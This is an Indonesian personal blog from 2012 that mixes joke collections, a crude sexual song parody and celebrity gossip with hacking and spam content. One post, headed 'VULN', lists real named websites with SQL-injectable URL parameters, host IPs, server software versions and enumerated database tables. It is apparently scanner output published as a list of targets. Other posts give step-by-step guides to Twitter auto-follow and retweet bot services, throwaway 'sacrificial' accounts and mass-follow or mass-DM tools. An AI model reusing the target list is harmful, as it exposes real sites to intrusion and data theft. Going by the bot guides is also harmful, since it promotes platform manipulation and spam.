Digital clock

Pencarian

Memuat...

Rabu, 26 September 2012

Kumpulan jokes lucu !!! [ngakak guling guling]

Spoilerfor cekidot gan:
Seorang wartawan pengen meliput kecelakaan dari dekat, akhirnya dia dpt ide

"minggir-minggir smwa, saya ayah korban, saya ayah korban!
beri saya jalan!

benar saja, kerumunan itu membiarkan dia lewat, tapi smwa mata terarah kpda wartawan trsebut..
(dalam hati dia {wartawan} "ge-er" : berhasil jg ide gue)

ketika sampai di tengah-tengah kerumunan, ia terpana saat melihat

SEEKOR ANAK MONYET tergeletak tak berdaya


Spoilerfor cekidot gan:
Tips mengatasi pacar selingkuh :
1. Coba bicarakan baik2.
2. Ajak ketempat sepi nan romantis (seperti pegunungan, bukit, dll).
3. Ungkapkan bahwa betapa kamu menyayangi dia.
4. Peluk dan dekap erat dia.
5. Liat kiri-kanan, begitu gk ada org, dorong ke jurang... Нанананана ƪ(˘⌣˘┐ ƪ(˘⌣˘ʃ ┌(˘⌣˘ʃ
byzatheshadow 45[tr45]


New update !!!!



Spoilerfor cekidot gan:
Cwo: yang kimpoi yuk !!!
cwe: ga ah bang kan ane masi sekolah
cwo: Ohhh kirain libur


Spoilerfor cekidot gan:
Anak: Mang mang
Tukang cendol: ap de??
anak es cendol segelas brpaan mang??
Tukang cendol: 3000 de
Anak: kalo setetes??
tukang cendol: ya gratis de
Anak: ooh kalo gtu sy minta d tetesin cendol sampe gelas sy penuh mang
Tukang cendol: ^%^&%*&%^*^*%


Spoilerfor cekidot gan:
GuruMenggambar apel) ini gambar apa anak" ??
Murid: Pantat bu guruuu
Guru: (kesal dan mengadukannya ke kepala sekolah)
Kepsek: dasar anak" kurang ajar semua !!! nah ini siapa lagi ni d antara kalian yg berani menggambar pantat d papan tulis !!!
Murid: Tukan bener buguruu itu gambar pantattt !!!
Guru: %$!$&^%!$%$


Spoilerfor cekidot gan:
Ternyata walau merek nya sama Kopi ABC lebih aman d konsumsi dari pada Batre ABC,, !!!


Spoilerfor cekidot gan:
krisdayanti : pilihlah aku
anang : jangan memilih aku
syahrini : kau yang memilih aku
ashanty : aku yang dipilih
tukang jual cd : dipilih dipilihhhhh


Spoilerfor cekidot gan:
"Buanglah pacarmu pada tempatnya!"
indikasi: pacran dpt menyebabkan kehgmilan, gangguan keimanan, gangguan keuangan & pikiran.
TTD: (Dinas Kebersihan)


Spoilerfor cekidot gan:
Suatu ketika, ada sebuah sungaiyang lebar. Di satu sisi sungai tinggal kelinci, dan di sisi lainnya hidup seekor beruang.

Suatu hari, beruang itu duduk di atas tunggul, menikmati makan buah. Lalu ia mendengar ada yang berteriak padanya, yaitu kelinci.

"Hei! Hei, Teddy, menyeberanglah ke sini. Aku punya sesuatu yang mau kutunjukkan padamu!"

"Jangan sekarang! Aku sedang makan."

"Oh, ayolah!" kata kelinci. "Ini benar-benar penting."

"Tidak mungkin."

"Ayolah. Ini mendesak."

Jadi beruang memutuskan untuk pergi menyeberangi sungai yang lebar itu. Dia memerlukan waktu berjam-jam untuk bisa menyeberangi sungai itu. Dia hampir tenggelam. Dan ketika ia akhirnya sampai di seberang dia mengerang dan terengah-engah, dan berbicara kepada kelinci,

"Nah, kelinci," dia terengah. "Apa yang ingin kamu beritahukan kepadaku?"

"Hei, Teddy," kelinci itu berkata, "lihatlah betapa banyaknya buah yang di seberang sungai."


Spoilerfor cekidot gan:
Dua pemancing memutuskan untuk menyewa perahu di danau. Setelah memancing berjam-jam di berbagai tempat dan tidak ada satupun ikan yang tertangkap, mereka memutuskan untuk mencoba sekali lagi sebelum berhenti. Tiba-tiba, ikan mulai menggigit umpan dan mereka ternyata hanya punya waktu 20 menit.

"Hei, kita harus menandai tempat ini sehingga waktu berikutnya kita akan tahu di mana ikan berkumpul," kata salah seorang pemancing tersebut.

"Ide bagus," jawab orang kedua, mengambil sekaleng cat semprot dan membuat tanda X besar di lantai perahu.

"Kenapa kau melakukan itu?" temannya bertanya.

"Sekarang siapa yang menyewa perahu ini akan tahu di mana ikan-ikan itu berada."


Spoilerfor cekidot gan:
Guru Fisika: "Isaac Newton sedang duduk di bawah pohon ketika apel jatuh di kepalanya dan ia menemukan gravitasi. Bukankah itu menakjubkan?"

Siswa: "Ya, Pak, jika ia hanya duduk di kelas melihat buku seperti kita, ia tidak akan menemukan apa-apa..."


Spoilerfor cekidot gan:
Seorang wanita tua naik lift di Gedung Kantor New York City yang sangat mewah. Seorang wanita muda dan cantik masuk ke dalam lift dan berbau wangi lalu menoleh kepada wanita tua dan berkata angkuh, "Giorgio - Beverly Hills, $100 per ounce"

Wanita muda dan cantik berikutnya naik di lift dan juga sangat arogan menatap menjadi wanita tua itu dan berkata, "Chanel No 5, $150 per ounce!"

Sekitar tiga lantai kemudian, wanita tua itu telah mencapai tujuannya dan akan turun lift. Sebelum dia pergi, dia melihat kedua wanita cantik itu, tersenyum, lalu membungkuk, dan mengeluarkan sebuah kentut yang berbau paling busuk.

Dia meninggalkan kedua wanita itu di dalam lift, sambil mengatakan "Brokoli, 49 sen sekilo!"
 
 
 

Teks original dari lagu oleh SMASH (seven maho as seven homo)

ga sengaja dapetin teks aslinya S#MASH

Sodomi So well.

Kenapa pantatku cenat cenut tiap da kamu
Selalu otakku ngeres tiap dekat kamu
Kenapa tititku ngaceng tiap kau tatap aku
Selalu diriku malu tiap kau buka baju

Kenapa lidahku kelu tiap kau sepong aku
Selalu merindu pantatku tiap kau sentuh aku
kenapa pantatku ngilu tiap kau sodomi aku
Selalu ngaceng aku tiap kau bisikan cinta

Sodom me so well..
Boys I need You..
Please let it in
very slowly..
Sodom me so well..
Boys I need You..
Please let it in
very slowly..

Tahukah kamu saat kita pertama bercinta
Hatiku berkata pantatmu ada yang berbeda
Tahukah sejak kita sering tusbol bersama
Tiap jam, menit, detik ku hanya ingin berdua
Tahukah kamu, ku takkan pernah lupa
Saat kau bilang, punya titit gedenya sama
Ku tak menyangka
Aku bahagia, ingin kupeluk dunia
Kau izinkan aku tuk dapat tusbol bersamaa..

Sodom me so well..
Boys I need You..
Please let it in
very slowly..
Sodom me so well..
Boys I need You..
Please let it in
very slowly

Ketika diriku rasakan tusbolanmu yang buat kusalah tingkah
you Know me so well, sodomi so well
You sodom me boy, I sodom You Back

Boy I need U
Boy I love U
Boy I heart U beybeh(2x)

Sodom me so well..
Boys I need You..
Please let it in
very slowly..
Sodom me so well..
Boys I need You..
Please let it in
very slowly

Tak ada yang bisa memisahkan kita,
Waktupun takkan tega, kau dan aku bersama, tusbol s'lamanya...


sumber Kaskus

Rabu, 05 September 2012

VULN http://humormillnews.com

Target: http://humormillnews.com/hmill/read.php?id=%Inject_Here%3
Date: 9/5/2012 9:51:05 PM
DB Detection: MySQL >=5 (Auto Detected)
Method: GET
Type: Integer (Auto Detected)

hmn
Table Name Columns
attachments
banned
boards
calendar
calendar_holidays
embeds
fpcats
fplinks
log_online
members
message_icons
messages
moderators
poll_choices
polls
posttype
sessions
settings
smileys
stats
themes

VULN http://www.titanichonourandglory.com

Target:         http://www.titanichonourandglory.com/index.php?controller=Default&action=ShowContent&pageid=2
Host IP:        81.21.75.36
Web Server:     Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Powered-by:     PHP/4.4.1
DB Server:     MySQL >=4.1
Current DB:     titanichonour

VULN http://www.artigianisandona.it

Target:         http://www.artigianisandona.it/index.php?area=3
Host IP:        94.90.180.82
Web Server:     Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22
Powered-by:     PHP/4.3.10-22
DB Server:     MySQL

VULN http://ve.free-travels.ru/

Target: http://ve.free-travels.ru/books/item.php?id=%Inject_Here%3
Date: 9/5/2012 9:39:03 PM
DB Detection: MySQL (Auto Detected)
Method: GET
Type: Integer (Auto Detected)

p52708_db
Table Name Columns
antifyrf_commentmeta
antifyrf_comments
antifyrf_links
antifyrf_options
antifyrf_postmeta
antifyrf_posts
antifyrf_term_relationships
antifyrf_term_taxonomy
antifyrf_terms
antifyrf_usermeta
antifyrf_users
drupal_access
drupal_accesslog
drupal_actions
drupal_advpoll
drupal_advpoll_choices
drupal_advpoll_electoral_list
drupal_aes_passwords
drupal_aggregator_category
drupal_aggregator_category_feed
drupal_aggregator_category_item
drupal_aggregator_feed
drupal_aggregator_item
drupal_authmap
drupal_batch
drupal_block
drupal_block_custom
drupal_block_node_type
drupal_block_role
drupal_blocked_ips
drupal_ca_predicates
drupal_cache
drupal_cache_block
drupal_cache_bootstrap
drupal_cache_content
drupal_cache_field
drupal_cache_filter
drupal_cache_form
drupal_cache_image
drupal_cache_l10n_update
drupal_cache_menu
drupal_cache_page
drupal_cache_path
drupal_cache_rules
drupal_cache_token
drupal_cache_update
drupal_cache_views
drupal_cache_views_data
drupal_comment
drupal_content_group
drupal_content_group_fields
drupal_cont

VULN http://www.mepfurniture.co.uk

Target: http://www.mepfurniture.co.uk/view/item.php?id=%Inject_Here%2
Date: 9/5/2012 9:34:55 PM
DB Detection: MySQL >=5 (Auto Detected)
Method: GET
Type: Integer (Auto Detected)

mep
Table Name Columns
categories
customers
deliveries
groups
items
items_descriptions
items_pictures
lists
purchases
search
subcategories

VULN http://montserrat.edu

Target: http://montserrat.edu/news/press-release-item.php?id=%Inject_Here%2
Date: 9/5/2012 9:31:52 PM
DB Detection: MySQL (Auto Detected)
Method: GET
Type: Integer (Auto Detected)

mcadb
Table Name Columns
tbl_access
tbl_alumni
tbl_articles
tbl_articletypes
tbl_catalogs
tbl_categories
tbl_ce_courses
tbl_ce_instructors
tbl_contacts
tbl_course_offerings
tbl_courses
tbl_courses_temp
tbl_departments
tbl_employment
tbl_events
tbl_eventtypes
tbl_exhibit_images
tbl_exhibit_images_temp
tbl_exhibit_images_temp2
tbl_exhibit_years

Selasa, 04 September 2012

DownLoad Film Dewasa ...!

Langsung Download aja sebelum di BLLOK

Pasang Web Lain ke dalam Web Kita ( BLoger )

Untuk menampilkan suatu situs kedalam situs kita, Tambahkan halaman baru html/javascript,lalu copy paste kode di bawah ini :

<iframe name="Menampilkan situs dalam suatu situs" src="http://www.yahoo.com" marginwidth="0" marginheight="0" readonly ="true" vspace="0" hspace="0" allowtransparency="true" scrolling="yes" width="300" frameborder="0" height="250"></iframe>
Untuk alamat situs yang ingin dimasukkan saya ambil contoh :
www.yahoo.com 



sumber

Senin, 03 September 2012

Minggu, 02 September 2012

Bukti Boyband Smash Indo Penjiplak Boyband Korea

Dan akhirnya g sengaja nie buka salah satu web di topik utama membahas mengenai Smash menjiplak nama dan lagu2 dari Boyband asal Korea.
Dari nama mirip dengan SMASH nya Korea bahkan bisa dibilang sama persis. Nah, nada lagu dan cara menyanyikannya juga 90% mirip dengan lagunya 1TYM, boyband Korea juga yang judulnya Without You yg hampir mirip dengan judul lagu smash I heart you. Liat deh video ini dan bandingkan dengan videonya SMASH :
  Silahkan Bandingkan Ke dua Video Berikut Ini Gan ...

Setelah saya dengar ternyata banyak yg sama, bahkan dari sumber dan teman2nya juga berkata sama hanya ada beberapa yg beda di beat. Untuk gaya ternyata menitu SUJU berikut foto cover dan video Suju...
silahkan disimak....
sumber Kaskus
Quote:

Sabtu, 01 September 2012

AUto Retwet ,.

New Auto Followers + Auto Retweet + Auto Favorite



alhamdullilah , akhirnya keluar juga trik New Auto Followers + Auto Retweet + Auto Favorite yang baru , ini sama seperti auto like facebook / auto subscribe facebook , hehe , kali ini trik New Auto Followers + Auto Retweet + Auto Favorite memakai aplikasi aoret , dimana kita bisa mendapatkan followers hingga ratusan orang , ditambah lagi kita bisa mendapatkan puluhan retweet (rt) + puluhan favorite di tweet kita ,

saya jadi pingin ketawa , kenapa ? karena lama kelamaan yang main facebook dan twitter adalah bot alias robot,sama seperti facebook , trik ini pasti juga punya resiko , nanti saya jelaskan dibawah

baiklah pertama kita ke Langkah - Langkah New Auto Followers + Auto Retweet + Auto Favorite

1. buka http://autoretweet.biz/
3. klik masuk atau izinkan
4. maka akan tampil gambar seperti ini

5. untuk auto followers klik followers lalu klik use

6. tunggu hingga muncul tulisan succes added
7. untuk auto favorite klik favorites
8. copy id twet anda , dengan cara klik bentangkan > klik rincihan > lihat url

cth https://twitter.com/myhafiezers/status/236477087756730368 maka id nya adalah 236477087756730368

9. klik use
10. untuk auto retweet , klik Retweet , pastekan lagi id tweet nya , klik use

Sekarang Lihat tweet anda ^_^

Seperti biasa , jika menggunakan trik kerugiannya adalah , akun akan dibanned dan twet kita akan otomatis update / retweet / favorite / follow tweet orang lain,


Cara Aman Menggunakan Aplikasi New Auto Followers + Auto Retweet + Auto Favorite [AORET]
1.Buatlah banyak akun twitter
2. login ke aoret dengan memakai akun utama
3. ambil id twittter nya , misal 223071974
4. lalu langsung cabut akses , caranya klik pengaturan > aplikasi > cari aoret > klik cabut akses
5. lalu login pake akun tumbal (point 1)
6. ketikka mau follow , masukkan id twitter utama , (point 3 = 223071974)

Cara Keluar Atau Mengnonaktifkan Apliasi Aoret yaitu , Klik Pengaturan > aplikasi > cari aoret > cabut akses

Jangan Lupa Follow My Twitter -> @myhafiezers

Bagi Yang Pingin Share Ulang (COPAS) Tolong Sertakan Link Sumbernya !


[Update] -> Tambahan Situs Penyedia Auto Retweet Gratis
  • http://retweet.a4sn.com/index.php
SEKALI LAGI ANE BILANG , YANG BUAT AORET INI BUKAN ANE , DAN ANE CUMA BANTU SHARE AJA ! <== PESAN INI UNTUK ORANG ORANG YANG MASIH BOCAH !

Berikut Videonya
Semoga Artikel New Auto Followers + Auto Retweet + Auto Favorite Bermanfaat Bagi Anda.

Read more: http://myhafiezers.blogspot.com/2012/08/new-auto-followers-auto-retweet-auto.html#ixzz25F0CJ1d6

Kumpulan TOOLS penting Twiter .

UPDATE

ada yg minta mirrornya nih sedooooooooooooott gan..

ada jg yg minta lebih banyakin follower tp secara cuma2...
nih kesini aja gan, mayan tiap site 100 followers/hari (katanya)
Quote:Original Posted By

http://plusfollower.info
http://followback.info
http://hitfollow.info
http://newfollow.info
http://letgetmorefollowers.info


UPDATE TOOLS

ada yg minta tools, nih beberapa yg ane tau:
Quote:Original Posted By

http://manageflitter.com > unfollow yg ga followingback
http://twitwipe.com > delete twit semaumu
http://traffup.net > naikin traffic via RT, bisa naikin web traffic jg
http://tweetsqueue.com > ngejadwal twit
http://tweetstats.com > nyari tau trending topic
http://tweetmanager.com > ya twitter manager
http://tweetbooster.net > naikin traffic via RT
http://autotweeting.com/ > ngejadwalin twit
http://twiends > tambah follower
http://tweers.com > sama kaya youlikehits.com (social media exchange)
https://socialoomph.com/ > twit manager
http://statweestics.com > nyari tau trending topic jg
http://www.twellow.com/ > sama kaya twiends
http://twubs.com > riset #hastags
http://www.vibethemes.com/twittermassdm/ > kirim direct message secara massal
http://twitterdmer.com/ > auto DM jika ada yg follow
http://www.tweeteraser.com > delete twit
http://futuretweets.com/ > ngejadwal twit
http://dlvr.it/ > twitter feeds
http://twitterfeed.com > twitter feeds
capek gan ngetik trus.. sok yg lain mau nambahin...silahkan...


UPDATE TOOLS LAGI

Quote:Original Posted By

http://twitterfall.com/ > tools keren buat twitter marketing nih, ada shortcut buat DM,RT,Favorite,Follow,Reply,Report,Qrait sama org lain yg kita sesuaikan dengan target market kita.. Cocok buat market research..

mau nambahin...silahkan...


UPDATE TOOLS

Quote:Original Posted By

[PHP] Script follow massal

http://twittertool.in/tools/massfollow.php

http://twitter.lazkano.net/follow.php


AutoClicker

Quote:Original Posted By

_http://www.datafilehost.com/downloa...-7a60e184.html
   sumber

Mendapatkan Banyak FOllower

http://kumpulan-terbaru.blogspot.com/2012/06/cara-menambah-memperbanyak-followers.html